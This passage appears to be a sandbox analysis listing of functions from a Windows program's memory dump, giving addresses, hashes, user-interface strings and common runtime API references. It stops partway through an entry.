Opcode ID: 9ebc3f8791c6b8289bf8c8e7f4067a69604b92e1bd160a509c815b8c2034e534
Instruction ID: 753140924940f02c262a1b61f86bb3ad12b4c54247477ff6e38cfe5cc03f3ab6
Opcode Fuzzy Hash: 9ebc3f8791c6b8289bf8c8e7f4067a69604b92e1bd160a509c815b8c2034e534
Instruction Fuzzy Hash: 53129032A186948AE721CB35D4406ADB7A4FF9D784F159336EE8993754EF38E581CB00

Function 00007FF69DCE95D0 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

%s/%s_%08X, xrefs: 00007FF69DCE96E9
#Child, xrefs: 00007FF69DCE9777
%s/%08X, xrefs: 00007FF69DCE9701

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: #Child$%s/%08X$%s/%s_%08X
API String ID: 0-2123028019
Opcode ID: 6564603271906744a084b27cebc27f8ee116fdee1f550b92d9015f8f65120e3a
Instruction ID: a3b0434b19074a6ff533585679e3112449d7152961ff8f071ade26dfa5a1ae67
Opcode Fuzzy Hash: 6564603271906744a084b27cebc27f8ee116fdee1f550b92d9015f8f65120e3a
Instruction Fuzzy Hash: 7A6115A2908785D6E735CF3294422BDB2B8FF55344F049332DB9993191EF3CE8A68B10

Function 00007FF69DD02C20 Relevance: 3.4, APIs: 2, Instructions: 887COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD02DDA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD02DF9

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: ad0d56921161f60f4fee7998089b0a0993db810df0f01b13ce22bf7f1f26bb7b
Instruction ID: 044924aae05d24a167d5eceb75ffe84168a78e02af203498a4363b7f461fdd92
Opcode Fuzzy Hash: ad0d56921161f60f4fee7998089b0a0993db810df0f01b13ce22bf7f1f26bb7b
Instruction Fuzzy Hash: 8EA25B33925B8886C712CF3BD481168B764FFADB88B19D726DE4863771EB25E494DB00

Function 00007FF69DD0F260 Relevance: 3.1, Strings: 2, Instructions: 635COMMON

Download Yara Rule

Strings

#ComboPopup, xrefs: 00007FF69DD0F464
##Combo_%02d, xrefs: 00007FF69DD0FA88

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: malloc$ExclusiveLockfreememmove$AcquireRelease
String ID: ##Combo_%02d$#ComboPopup
API String ID: 1632963668-3270323658
Opcode ID: bda35faa3c674d777a5577ed3cece6df080ab1f69d092ef411a26436bbd495f4
Instruction ID: 73d50108897733339a5471fa1384400f000c8e9e4695d2cb69b3bc5092b25356
Opcode Fuzzy Hash: bda35faa3c674d777a5577ed3cece6df080ab1f69d092ef411a26436bbd495f4
Instruction Fuzzy Hash: 7572E472E18B8585E721CF36D4401BDB3A0FB99788F14A375EE8C66665EF38E449CB40

Function 00007FF69DCF7530 Relevance: 3.1, Strings: 2, Instructions: 593COMMON

Download Yara Rule

Strings

##NavUpdateWindowing, xrefs: 00007FF69DCF75F6
[popup] ClosePopupsOverWindow("%s"), xrefs: 00007FF69DCF7E13

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: ##NavUpdateWindowing$[popup] ClosePopupsOverWindow("%s")
API String ID: 0-1315485432
Opcode ID: 672408678cec5f83d36abe98d6bf50dd330f28e57f5041c14d83c66613f96086
Instruction ID: 272300be31655aa81af6c0d7103fad8426bb3f3ef52edd0724b34a12ad508d3a
Opcode Fuzzy Hash: 672408678cec5f83d36abe98d6bf50dd330f28e57f5041c14d83c66613f96086
Instruction Fuzzy Hash: 36520666A08686C6EB398B3991403F973B8FF46304F089675CBD9936D1EF3CB4669704

Function 00007FF69DD00340 Relevance: 2.7, APIs: 2, Instructions: 214COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD00442
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD00682

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: fd0e62a8e76811c1a5d20c2e7b3a4aac73a0ec4fc291562b24cebab7bf40d794
Instruction ID: f1281177d4c45d6f24a8eddcf0c2014e6ccbd1e74ef3e32fc45622f4af14011d
Opcode Fuzzy Hash: fd0e62a8e76811c1a5d20c2e7b3a4aac73a0ec4fc291562b24cebab7bf40d794
Instruction Fuzzy Hash: 36910432A1968596DB21CB3AD1007B9B360FF997C5F14E332DE89A2755FF38E0498740

Function 00007FF69DCEA7E0 Relevance: 1.9, Strings: 1, Instructions: 633COMMON

Download Yara Rule

Strings

#RESIZE, xrefs: 00007FF69DCEA9B3

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: #RESIZE
API String ID: 0-1383961720
Opcode ID: bc47c7a02d6bc9ceae6539735f87a977b97de62de314a3841b1bcd4872301e06
Instruction ID: f4cc23dcf7c29a24434ef0fba19d6e517e1b62f16a6c9a84ed644ee0f9c9d087
Opcode Fuzzy Hash: bc47c7a02d6bc9ceae6539735f87a977b97de62de314a3841b1bcd4872301e06
Instruction Fuzzy Hash: E562EC73D18789CAE362CB3790421B9B374EF5D384F199731EA89B25A1EF38B5459B00

Function 00007FF69DCF5020 Relevance: 1.8, Strings: 1, Instructions: 561COMMON

Download Yara Rule

Strings

[nav] NavInitRequest: ApplyResult: NavID 0x%08X in Layer %d Window "%s", xrefs: 00007FF69DCF5227

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: [nav] NavInitRequest: ApplyResult: NavID 0x%08X in Layer %d Window "%s"
API String ID: 0-1553127323
Opcode ID: 9836218f39ca724b273ad881e002db2137144c8ca5b7f869d94ca929fd3efbb6
Instruction ID: 16aadbbc68644320d2ba26523dc74e35077507c394b72f59c52a3549468c8f6a
Opcode Fuzzy Hash: 9836218f39ca724b273ad881e002db2137144c8ca5b7f869d94ca929fd3efbb6
Instruction Fuzzy Hash: 775213A2D283C2C5E7718B29D0447FD27F8EB61748F198275CB88962E4EF797486DB10

Function 00007FF69DD10650 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF69DD10B65

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: c
API String ID: 0-112844655
Opcode ID: 02229116bd658d80951c3a9a99ca1a84daf8f817ffb4fbaa2c81afc8e9fc7747
Instruction ID: 7ea6c1a841ec0f8def0cad9a40198cf7afdb6b9b1b6ebd4f3fe6c84f7537851b
Opcode Fuzzy Hash: 02229116bd658d80951c3a9a99ca1a84daf8f817ffb4fbaa2c81afc8e9fc7747
Instruction Fuzzy Hash: BB12C132E0CB8586E725DB36D5401B9B7A0FF99348F146371EA8C636A5EF38E549CB40

Function 00007FF69DD013E0 Relevance: 1.4, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF69DD0143A

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 22ac441a1cb9fff21da14ed93ac3b3d9369d6eada439015b470405929503d1a8
Instruction ID: 5a2abb56c6986659fe3e266bf6399b24d99d87ab2b69e3d3586af4af895cb27d
Opcode Fuzzy Hash: 22ac441a1cb9fff21da14ed93ac3b3d9369d6eada439015b470405929503d1a8
Instruction Fuzzy Hash: 466107A3A1C1E242D3664B2CA55127D6EE0F78A384F1CA3B4FACEC6B85DD3CD5098740

Function 00007FF69DD01130 Relevance: 1.4, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF69DD0119A

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: e56bc5e0870cf9c2c9b7090139414b253ba71cf72561794238e59cf830246f75
Instruction ID: 3a6873ba5b2fc7ec4e650aef6529817dd49ad05c53c389b768cfc43cd1c3699f
Opcode Fuzzy Hash: e56bc5e0870cf9c2c9b7090139414b253ba71cf72561794238e59cf830246f75
Instruction Fuzzy Hash: B561C173B1C6E186D7258B38E405A79BE94F79A788F4993B5DACCC2A45EE2ED005C700

Function 00007FF69DD0CAA0 Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d56cbef0ee742cb5ea1e22243022b532497df5c148dd93e1a784245e58ef5f
Instruction ID: 2c9d1c3c581f93af3613d6f045410100946118fd9dd85a0de9ddb99195974780
Opcode Fuzzy Hash: 75d56cbef0ee742cb5ea1e22243022b532497df5c148dd93e1a784245e58ef5f
Instruction Fuzzy Hash: 2D223432E0C2C686E7729A3AC0012B96695EFC57C4F1897B1DE8D976D5FF7C68898301

Function 00007FF69DCE0A30 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b4413bd69574e5421cfc2f10481860617d36b465ef62f470367d0e7df288fb
Instruction ID: 727820273cf2ddf2c150eb76011fce8bfe14faa5c756c9dae0c87e2a9c7da065
Opcode Fuzzy Hash: a0b4413bd69574e5421cfc2f10481860617d36b465ef62f470367d0e7df288fb
Instruction Fuzzy Hash: 1E023982E186AAC5F732863145023F963A5CF6A344F1C97B2EDD8725D5FF2C78939260

Function 00007FF69DCE0A0C Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89108fe028941a727a34f4b20f9d9f921c46dd11ab53017d91f832da806bad6a
Instruction ID: 261bb162b0f5f6f2dc6e74587de186b3a00db6195c266892bfeb4aa81020b05c
Opcode Fuzzy Hash: 89108fe028941a727a34f4b20f9d9f921c46dd11ab53017d91f832da806bad6a
Instruction Fuzzy Hash: F0026A92E186A6C5F7328B3141023FD63A9CF5A344F1857B2DDD9B65C5FF2C6883A260

Function 00007FF69DCEFC90 Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a83ec3caa102d43c8b81d7a5a7f6e8d987d0c28a9999163b53977baf43db37fb
Instruction ID: 4a83716cd8e6cb5e8822c263bcf20e7f8695ca5428cb6b4bda8b9f984b2a9ea6
Opcode Fuzzy Hash: a83ec3caa102d43c8b81d7a5a7f6e8d987d0c28a9999163b53977baf43db37fb
Instruction Fuzzy Hash: 3012C9738096D5CBD2A3CB2741012FCBBE8DB66740F0983B6D685533A2EB742665E712

Function 00007FF69DCFF640 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7787bc6097c5dce51bd277d8a7d6544313e956f436ef6f69793586665f8b5725
Instruction ID: d81a5b4ed6ffa064cd6da08471e923c7968e933936c6bd6bb6eb1d577d194d50
Opcode Fuzzy Hash: 7787bc6097c5dce51bd277d8a7d6544313e956f436ef6f69793586665f8b5725
Instruction Fuzzy Hash: 8AF1DB23D18B8D85E222963744420F9B264EFBF385F1DE772FE84B16B2EF3561966500

Function 00007FF69DD0DC50 Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f75254fc0e6fcf6cd86b54cf61ae2a455ff0a34fc3fee8d9c6a5d30b2084834e
Instruction ID: 08e1800e64cc4cd5002ec17c0d21ab571a550f5e742cd16766ecbb1c4d63b23e
Opcode Fuzzy Hash: f75254fc0e6fcf6cd86b54cf61ae2a455ff0a34fc3fee8d9c6a5d30b2084834e
Instruction Fuzzy Hash: 9EF1D722D19BCD85E223963794422B9B750EFAE3C4F1CE722FD9872565EF68B1C58700

Function 00007FF69DCE6990 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458a1e45f6dbd4399965bb0196548fcb0f5d4cf9f5d7e68ca9faf478eefec148
Instruction ID: 4061483c2103adeee3bd86353d132a533cbcd6026a6693a3187a0837b192efe2
Opcode Fuzzy Hash: 458a1e45f6dbd4399965bb0196548fcb0f5d4cf9f5d7e68ca9faf478eefec148
Instruction Fuzzy Hash: 5BC1D7D299D6D1D4EB728E3541122B926FCDF01788F184AB5EDCD8A1C5EF2DAD42A230

Function 00007FF69DD0BCB0 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memcmpmemmove
String ID:
API String ID: 1261870273-0
Opcode ID: 5a6ef48f327f7d7625e5fb49c84cfef995a8813d9a9e0eeb3f1403aa3df09d7a
Instruction ID: 07d6b0efac32e75b50450b43ff206238c44cc982e68823cbaeeb66388fe09db1
Opcode Fuzzy Hash: 5a6ef48f327f7d7625e5fb49c84cfef995a8813d9a9e0eeb3f1403aa3df09d7a
Instruction Fuzzy Hash: 7EE1A4729087C586E761CB26D0413E9B760FF99788F14A376DBC9536A5EF39E089CB00

Function 00007FF69DCF3BE0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90f4021dee514a5be9b9e43b83f501943647ca4d9f866977cad0b68345d4fb7
Instruction ID: f4912cba896fb3ffb597daea70b891335440d897b1ed75090f567c7775c22896
Opcode Fuzzy Hash: e90f4021dee514a5be9b9e43b83f501943647ca4d9f866977cad0b68345d4fb7
Instruction Fuzzy Hash: FCC1F722D1C68ED1F272523B40424F8A2A4DF7E385F199B72FD9CB25A1EF3975C66600

Function 00007FF69DCD3B70 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4af27b85f7c30ed204885956fc0cd3fc870e04f53adb44cae2797de13ad85b5
Instruction ID: e350c8e81ee8fa6a3c11031c44e68aa109784a88a6fa62b6daa6b2daca94c939
Opcode Fuzzy Hash: d4af27b85f7c30ed204885956fc0cd3fc870e04f53adb44cae2797de13ad85b5
Instruction Fuzzy Hash: 72E1B672A09B419AE710CF55E88039EB7B8FB84358F501276EACC57B68EF78D154CB80

Function 00007FF69DCF6CE0 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

